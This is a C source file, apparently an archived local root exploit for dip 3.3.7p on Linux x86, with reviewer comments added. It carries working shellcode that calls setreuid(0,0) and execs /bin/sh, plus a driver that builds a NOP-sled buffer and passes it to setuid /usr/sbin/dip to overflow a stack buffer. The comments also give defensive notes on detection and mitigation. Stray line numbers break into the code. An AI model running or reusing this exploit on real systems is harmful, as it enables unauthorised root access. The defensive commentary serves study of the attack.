C/C++ Source or Header  |  2005-02-12  |  870b  |  49 lines

  1. /* Linux x86 dip 3.3.7p exploit by pr10n */
  2.  
  3.  
  4. #include <stdio.h>
  5.  
  /* x86 one-byte no-op opcode; main() uses it as padding in front of the payload. */
  #define NOP 0x90


  /*thanks to hack.co.za*/
  /*
   * Position-independent Linux/x86 payload using the int 0x80 syscall interface.
   * What the opcode bytes show:
   *   - b0 46, cd 80        : syscall 70 (setreuid) with ebx = ecx = 0
   *   - eb 1d ... e8 de ff ff ff : jmp/call/pop sequence that locates the
   *                           trailing "/bin/sh" string at run time
   *   - b0 0b, cd 80        : syscall 11 (execve) on that string
   *   - 31 c0 31 db 40, cd 80 : syscall 1 (exit) with status 0 if execve returns
   * The byte sequence contains no 0x00, so it survives being passed as a C
   * string argument.
   *
   * NOTE(review): setreuid(0,0) only changes anything when the process already
   * has root as its effective uid, which suggests the target binary is expected
   * to be installed setuid root -- confirm against the dip package or advisory.
   * For detection, the fixed byte pattern and the "/bin/sh" suffix are usable
   * as a signature in process arguments and in memory.
   */
  char shellcode[] =
            "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
            "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
            "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
            "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
  15.  
  16.  
  17.  
  /*
   * Copies the current stack pointer (ESP) into EAX with inline assembly.
   *
   * There is no return statement: the value reaches the caller only if the
   * compiler leaves EAX untouched, EAX being the integer return register in the
   * 32-bit x86 C calling convention. In standard C, using the result of a
   * non-void function that returns nothing is undefined behaviour, so this is
   * tied to 32-bit x86 and GCC-style inline assembly.
   *
   * main() uses the result as a guess for stack addresses in another process,
   * which assumes stack placement is predictable from one process to the next.
   * Address-space layout randomisation removes that assumption.
   */
  unsigned long get_sp(void){ __asm__("movl %esp, %eax");}
  19.  
  /*
   * Proof-of-concept driver: builds a 136-byte argument and runs /usr/sbin/dip
   * with it as the value of the "-l" option.
   *
   * argv[1] is a decimal offset subtracted from this process's stack pointer to
   * form the address written repeatedly into the argument.
   *
   * The vulnerable code is inside dip and is not shown here. Presumably dip
   * 3.3.7p copies the "-l" value into a fixed-size stack buffer without a length
   * check -- confirm against the vendor advisory.
   *
   * Defensive notes:
   *   - Check whether /usr/sbin/dip is installed and carries the setuid bit;
   *     remove the bit or the package where dip is not needed, and update it
   *     where it is.
   *   - The argument layout is padding bytes (0x90), then the payload, then
   *     repeated address words. A non-executable stack, stack-smashing
   *     protection in the target build, and ASLR each break an assumption
   *     this layout depends on.
   *   - execve audit records for dip whose "-l" argument contains long runs of
   *     0x90 or other non-printable bytes are a practical detection point.
   *
   * NOTE(review): only <stdio.h> is included, main has no declared return type,
   * and exit/atoi/strlen/memcpy/execl are called without prototypes, so the
   * file relies on pre-C99 implicit declarations.
   */
  main(int argc, char *argv[]){

  /* Argument passed to dip; ptr is declared below but never used. */
  char buf[136];
  int i;
  int offset=0,*ptr;
  long ret;


  /* Exactly one argument (the offset) is required; otherwise print usage and exit 0. */
  if(argc!=2){
  printf("usage: %s offset\n",argv[0]);
  exit(0);}

  /* atoi gives no error indication; non-numeric input yields 0. */
  offset=atoi(argv[1]);

  /* Guessed address: this process's stack pointer minus the user-supplied offset. */
  ret=(get_sp()-offset);

  /*
   * Fill buf with copies of the guessed address, starting at byte offset 1 and
   * stepping by 4.
   * NOTE(review): with a 4-byte long the last store (i = 133) covers bytes
   * 133..136, one past the end of buf, and every store goes through a
   * misaligned cast pointer, so this PoC itself has undefined behaviour.
   */
  for(i=1;i<136;i+=4){
  *(long *)&buf[i]=ret;}

  /* NOTE(review): ret is a long but is printed with %x. */
  printf("\nusing: 0x%x\n\n",ret);

  /*
   * Overwrite the front of buf with NOP bytes, leaving room for the payload
   * plus 40 trailing bytes that keep the address copies written above.
   */
  for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++)
  buf[i]=NOP;

  /* Place the payload directly after the NOP padding; its terminating NUL is not copied. */
  memcpy(buf+i,shellcode,strlen(shellcode));

  /*
   * Replace this process with dip, passing buf as the "-l" value. The return
   * value is not checked, so a failed execl falls off the end of main.
   */
  execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0);

  }
  49.